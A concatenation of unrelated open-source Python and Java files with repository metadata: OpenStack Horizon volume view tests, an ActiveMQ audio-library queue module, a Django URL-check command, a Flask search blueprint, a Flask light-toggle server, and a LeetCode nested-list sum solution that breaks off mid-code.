api.glance: ('image_get',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 200,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=image.id,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get image from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_type_list',
'volume_list',
'volume_snapshot_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 200,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)) \
.AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=image.id,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get image from dropdown list
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_under_image_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 1, 'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
# in django 1.6 filesizeformat replaces all spaces with
# non-breaking space characters
if django.VERSION >= (1, 6):
msg = (u"The volume size cannot be less than the "
u"image size (20.0\xa0GB)")
else:
msg = (u"The volume size cannot be less than the "
u"image size (20.0 GB)")
self.assertFormError(res, 'form', None, msg)
@test.create_stubs({cinder: ('volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_under_image_min_disk_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.get(name="protected_images")
image.min_disk = 30
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 5, 'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GB)")
@test.create_stubs({cinder: ('volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_gb_used_over_alloted_quota(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 80,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'This Volume Is Huge!',
'description': u'This is a volume that is just too big!',
'method': u'CreateForm',
'size': 5000}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
expected_error = [u'A volume of 5000GB cannot be created as you only'
' have 20GB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
@test.create_stubs({cinder: ('volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_number_over_alloted_quota(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': len(self.cinder_volumes.list())}
formData = {'name': u'Too Many...',
'description': u'We have no volumes left!',
'method': u'CreateForm',
'size': 10}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
expected_error = [u'You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',
'volume_delete',),
api.nova: ('server_list',)})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
cinder.volume_delete(IsA(http.HttpRequest), volume.id)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',
'volume_delete',),
api.nova: ('server_list',)})
def test_delete_volume_error_existing_snapshot(self):
volume = self.cinder_volumes.first()
volumes = self.cinder_volumes.list()
formData = {'action':
'volumes__delete__%s' % volume.id}
exc = self.exceptions.cinder.__class__(400,
"error: dependent snapshots")
cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
cinder.volume_delete(IsA(http.HttpRequest), volume.id).\
AndRaise(exc)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'Unable to delete volume "%s". '
u'One or more snapshots depend on it.' %
volume.name)
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments(self):
PREV = settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point']
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = True
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
# Asserting length of 2 accounts for the one instance option,
# and the one 'Choose Instance' option.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.TextInput))
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = PREV
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments_cannot_set_mount_point(self):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.HiddenInput))
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_list',)})
def test_edit_attachments_attached_volume(self):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
cinder.volume_get(IsA(http.HttpRequest), volume.id) \
.AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)) \
.AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',),
api.nova: ('server_list',)})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
api.cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
.MultipleTimes().AndReturn(limits)
self.mox.ReplayAll()
res = self.client.get(VOLUME_INDEX_URL)
self.assertTemplateUsed(res, 'project/volumes/index.html')
volumes = res.context['volumes_table'].data
self.assertItemsEqual(volumes, self.cinder_volumes.list())
create_link = tables.CreateVolume()
url = create_link.get_link_url()
classes = list(create_link.get_default_classes())\
+ list(create_link.classes)
link_name = "%s (%s)" % (unicode(create_link.verbose_name),
"Quota exceeded")
expected_string = "<a href='%s' title='%s' class='%s disabled' "\
"id='volumes__action_create' data-update-url=" \
"'/project/volumes/?action=create&table=volumes'> "\
"<span class='glyphicon glyphicon-plus'></span>%s</a>" \
% (url, link_name, " ".join(classes), link_name)
self.assertContains(res, expected_string, html=True,
msg_prefix="The create button is not disabled")
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_get',)})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res, "<h2>Volume Details: Volume name</h2>",
1, 200)
self.assertContains(res, "<dd>Volume name</dd>", 1, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.id, 1, 200)
self.assertContains(res, "<dd>Available</dd>", 1, 200)
self.assertContains(res, "<dd>40 GB</dd>", 1, 200)
self.assertContains(res,
("<a href=\"/project/instances/1/\">%s</a>"
% server.name),
1,
200)
self.assertNoMessages()
@test.create_stubs({cinder: ('volume_get',)})
def test_get_data(self):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = VOLUME_INDEX_URL + \
"?action=row_update&table=volumes&obj_id=" + volume.id
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
@test.create_stubs({cinder: ('volume_get',)})
def test_detail_view_with_exception(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndRaise(self.exceptions.cinder)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, VOLUME_INDEX_URL)
@test.create_stubs({cinder: ('volume_update',
'volume_get',)})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
cinder.volume_update(IsA(http.HttpRequest),
volume.id,
volume.name,
volume.description)
self.mox.ReplayAll()
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description}
url = reverse('horizon:project:volumes:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, VOLUME_INDEX_URL)
@test.create_stubs({cinder: ('volume_get',
'volume_extend')})
def test_extend_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': u'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 100}
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_extend(IsA(http.HttpRequest),
volume.id,
formData['new_size']).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = VOLUME_INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_get',),
quotas: ('tenant_limit_usages',)})
def test_extend_volume_with_wrong_size(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndReturn(self.cinder_volumes.first())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, 'form', None,
"New size must be greater than "
"current size.")
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
@test.create_stubs({cinder: ('volume_list',
'volume_backup_supported',
'tenant_absolute_limits'),
api.nova: ('server_list',)})
def _test_encryption(self, encryption):
volumes = self.volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
cinder.volume_backup_supported(IsA(http.HttpRequest))\
.MultipleTimes('backup_supported').AndReturn(False)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn(self.volumes.list())
api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
.MultipleTimes('limits').AndReturn(limits)
self.mox.ReplayAll()
res = self.client.get(VOLUME_INDEX_URL)
rows = res.context['volumes_table'].get_rows()
if encryption:
column_value = 'Yes'
else:
column_value = 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
|
394954369/horizon
|
openstack_dashboard/dashboards/project/volumes/volumes/tests.py
|
Python
|
apache-2.0
| 49,698 | 0.001127 |
#!/usr/bin/env python
# encoding: utf-8
"""
__init__.py
The MIT License (MIT)
Copyright (c) 2013 Matt Ryan
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import os
import stomp
import json
import afutils.file_pattern as pattern
from aflib3 import AFLibraryEntry
class AFMQ:
'''Represents a basic connection to an ActiveMQ
service for AudioFile.
'''
def __init__(self, queue_name):
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.disconnect()
def put(self, msg):
self.queue_handle.send(msg, destination=self.queue_name)
class BasicHandler:
'''Represents an ActiveMQ handler that consumes information
from the queue.
'''
def __init__(self, aflib, queue_name):
self.aflib = aflib
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.set_listener(queue_name, self)
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.stop()
def on_error(self, headers, message):
print '%s: Received an error: "%s"' % (self.__class__, message)
def on_message(self, headers, message):
print '%s: Received message: "%s"' % (self.__class__, message)
class AddFileHandler(BasicHandler):
'''Adds files to the AudioFile library as the files
are posted into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/library_additions')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
self.aflib.add_mp3(args[0], args[1])
class RenameFileHandler(BasicHandler):
'''Renames files from the old path to the new specified
path as the information is put into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/file_renames')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
song = AFLibraryEntry()
song.apply_dict(args[0])
newpath = pattern.get_new_path(song, args[1])
print 'Renaming "%s" as "%s"...' % (song.path, newpath)
os.rename(song.path, newpath)
if __name__ == '__main__':
pass
|
mattvryan/audiofile
|
afmq/__init__.py
|
Python
|
mit
| 3,351 | 0.021486 |
import logging
from django.core.management.base import BaseCommand
from citation.ping_urls import verify_url_status
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = '''Method that check if the code archived urls are active and working or not '''
def handle(self, *args, **options):
verify_url_status()
logger.debug("Validation completed")
|
dhruvilpatel/citation
|
citation/management/commands/validate_urls.py
|
Python
|
gpl-3.0
| 389 | 0.002571 |
from flask import Blueprint, flash, redirect, render_template, request, url_for
from sqlalchemy.orm.exc import NoResultFound
from ..sqltypes import HashableLocale as Locale
from ..work import Trope, Work
from .db import session
adv_search_bp = Blueprint('adv_search', __name__)
@adv_search_bp.route('/', methods=['POST'])
def result():
about = request.form.getlist('about[]', None)
category = request.form.getlist('category[]', None)
detail = request.form.getlist('detail[]', None)
error_redirect = redirect(url_for('index'))
if about is None or category is None or detail is None:
flash('Invalid arguments.', 'danger')
return error_redirect
if type(about) != list or type(category) != list or type(detail) != list:
flash('Invalid arguments..', 'danger')
return error_redirect
if len(about) != len(category) or len(about) != len(detail):
flash('Invalid arguments...', 'danger')
return error_redirect
query = zip(about, category, detail)
media_list = []
trope_filter = None
for about, category, detail in query:
if about == 'info':
if category == 'media':
media_list.append(detail)
elif about == 'trope':
try:
trope = session.query(Trope).get(detail)
except NoResultFound:
return error_redirect
if trope_filter is None:
trope_filter = Work.tropes.any(Trope.id == trope.id)
else:
trope_filter = trope_filter & \
Work.tropes.any(Trope.id == trope.id)
if not media_list and trope_filter is None:
flash('Invalid arguments....', 'danger')
return error_redirect
result = session.query(
Work,
Work.canonical_name(Locale.parse('en_US')).label('canonical_name')
)
if media_list:
result = result.filter(Work.media_type.in_(media_list))
if trope_filter is not None:
result = result.filter(trope_filter)
return render_template('adv_search/result.html', result=result)
|
clicheio/cliche
|
cliche/web/adv_search.py
|
Python
|
mit
| 2,111 | 0 |
#!/usr/bin/env python
from flask import (Flask, request, render_template)
from flask.ext import restful
from flask.ext.restful import reqparse
import pickle
SETTINGS_P = 'settings.p'
app = Flask(__name__)
api = restful.Api(app)
def get_settings():
settings = {'state':'off'}
try:
settings = pickle.load(open(SETTINGS_P, 'rb'))
except IOError:
pass
return settings
def set_state(state):
settings = get_settings()
settings['state'] = state
pickle.dump( settings, open(SETTINGS_P, 'wb'))
# Restful Resource for setting the light state
@api.resource('/api/state')
class SetState(restful.Resource):
def get(self):
settings = get_settings()
parser = reqparse.RequestParser()
parser.add_argument('value', type=str, location='args',
choices=['on','off'])
args = parser.parse_args()
value = args['value']
if value:
set_state(value)
settings = get_settings()
print "Setting state to {}".format(value)
return {'state':settings['state']}
# View to present a form to change the light state
@app.route('/', methods=['GET','POST'])
def index():
if request.method == 'POST':
set_state(request.form['state'])
settings = get_settings()
state = settings['state']
return render_template('index.html', state=state)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
ajportier/raspi-gpio-work
|
light-toggle/server.py
|
Python
|
gpl-2.0
| 1,463 | 0.005468 |
__source__ = 'https://leetcode.com/problems/nested-list-weight-sum/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/nested-list-weight-sum.py
# Time: O(n)
# Space: O(h)
#
# Description: Leetcode # 339. Nested List Weight Sum
#
# Given a nested list of integers, return the sum of all integers in the list weighted by their depth.
#
# Each element is either an integer, or a list -- whose elements may also be integers or other lists.
#
# Example 1:
# Given the list [[1,1],2,[1,1]], return 10. (four 1's at depth 2, one 2 at depth 1)
#
# Example 2:
# Given the list [1,[4,[6]]], return 27. (one 1 at depth 1, one 4 at depth 2, and one 6 at depth 3; 1 + 4*2 + 6*3 = 27)
#
# Companies
# LinkedIn
# Related Topics
# Depth-first Search
# Similar Questions
# Nested List Weight Sum II Array Nesting
#
# """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
import unittest
# 20ms 100%
class NestedInteger(object):
def isInteger(self):
"""
@return True if this NestedInteger holds a single integer, rather than a nested list.
:rtype bool
"""
def getInteger(self):
"""
@return the single integer that this NestedInteger holds, if it holds a single integer
Return None if this NestedInteger holds a nested list
:rtype int
"""
def getList(self):
"""
@return the nested list that this NestedInteger holds, if it holds a nested list
Return None if this NestedInteger holds a single integer
:rtype List[NestedInteger]
"""
class Solution(object):
def depthSum(self, nestedList):
"""
:type nestedList: List[NestedInteger]
:rtype: int
"""
def depthSumHelper(nestedList, depth):
res = 0
for l in nestedList:
if l.isInteger():
res += l.getInteger() * depth
else:
res += depthSumHelper(l.getList(), depth + 1)
return res
return depthSumHelper(nestedList, 1)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
Thought: https://leetcode.com/problems/nested-list-weight-sum/solution/
/**
* // This is the interface that allows for creating nested lists.
* // You should not implement it, or speculate about its implementation
* public interface NestedInteger {
*
* // @return true if this NestedInteger holds a single integer, rather than a nested list.
* public boolean isInteger();
*
* // @return the single integer that this NestedInteger holds, if it holds a single integer
* // Return null if this NestedInteger holds a nested list
* public Integer getInteger();
*
* // @return the nested list that this NestedInteger holds, if it holds a nested list
* // Return null if this NestedInteger holds a single integer
* public List<NestedInteger> getList();
* }
*/
1. DFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
return dfs(nestedList, 1);
}
public int dfs(List<NestedInteger> nestedList, int depth) {
int sum = 0;
for (NestedInteger e : nestedList) {
sum += e.isInteger() ? e.getInteger() * depth : dfs(e.getList(), depth + 1);
}
return sum;
}
}
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
for (NestedInteger ni : nestedList) {
sum += depthSum(ni, 1);
}
return sum;
}
private int depthSum(NestedInteger ni, int depth) {
if (ni.isInteger()) {
return ni.getInteger() * depth;
} else {
int sum = 0;
for (NestedInteger n : ni.getList()) {
sum += depthSum(n, depth + 1);
}
return sum;
}
}
}
2. BFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
Queue<NestedInteger> queue = new LinkedList<>();
int depth = 1;
for (NestedInteger ni : nestedList) {
queue.add(ni);
}
while (!queue.isEmpty()) {
int size = queue.size();
while (size-- > 0) {
NestedInteger cur = queue.poll();
if (cur.isInteger()) {
sum += cur.getInteger() * depth;
} else {
for (NestedInteger ni : cur.getList()) {
queue.add(ni);
}
}
